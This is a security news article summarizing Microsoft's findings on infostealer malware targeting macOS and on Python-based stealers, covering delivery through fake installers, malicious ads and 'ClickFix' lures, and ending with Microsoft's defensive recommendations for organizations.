Microsoft has warned security leaders that infostealer malware is no longer a Windows-only problem. New findings from Microsoft Defender Experts show attackers increasingly targeting macOS systems while abusing trusted applications and cross-platform tools to steal credentials at scale.
In a recent Microsoft Security Blog post, researchers outlined how threat actors are shifting tactics to blend malware delivery into legitimate user workflows.
Since late 2025, Microsoft has observed macOS-focused infostealer campaigns relying on deceptive advertising, fake software installers, and “ClickFix” techniques that persuade users to manually run malicious commands.
These attacks do not rely on the exploitation of known vulnerabilities within the software. Instead they rely heavily on social engineering tactics to circumvent security measures put in place to protect against malware.
Once installed, macOS infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer extract browser credentials, cloud tokens, cryptocurrency wallet data, and developer secrets from native macOS components like Keychain.
Python and Platform Abuse Increase Operational Risk
Microsoft also reported a growing surge in Python-based infostealers: “This gravitation towards Python is driven by ease of use and the availability of tools and frameworks allowing quick development, even for individuals with limited coding knowledge,” the tech giant wrote.
These types of malware are typically distributed via phishing email campaigns and will capture login credentials, session cookies, financial information, and cryptocurrency wallet data. To make it harder to track them down, attackers will often utilize legitimate services, including Telegram, for their command-and-control (C2) communications.
Platform abuse is compounding the problem. Microsoft observed campaigns that weaponized WhatsApp automation tools to spread malware laterally through contact lists, as well as fake PDF utilities promoted via search engine ads to distribute credential stealers.
Microsoft recommends that organizations implement additional user education and awareness training, monitor scripting and terminal activity occurring on macOS devices, and configure their Endpoint Detection and Response (EDR) solutions to detect fileless execution and unusual credential access attempts.
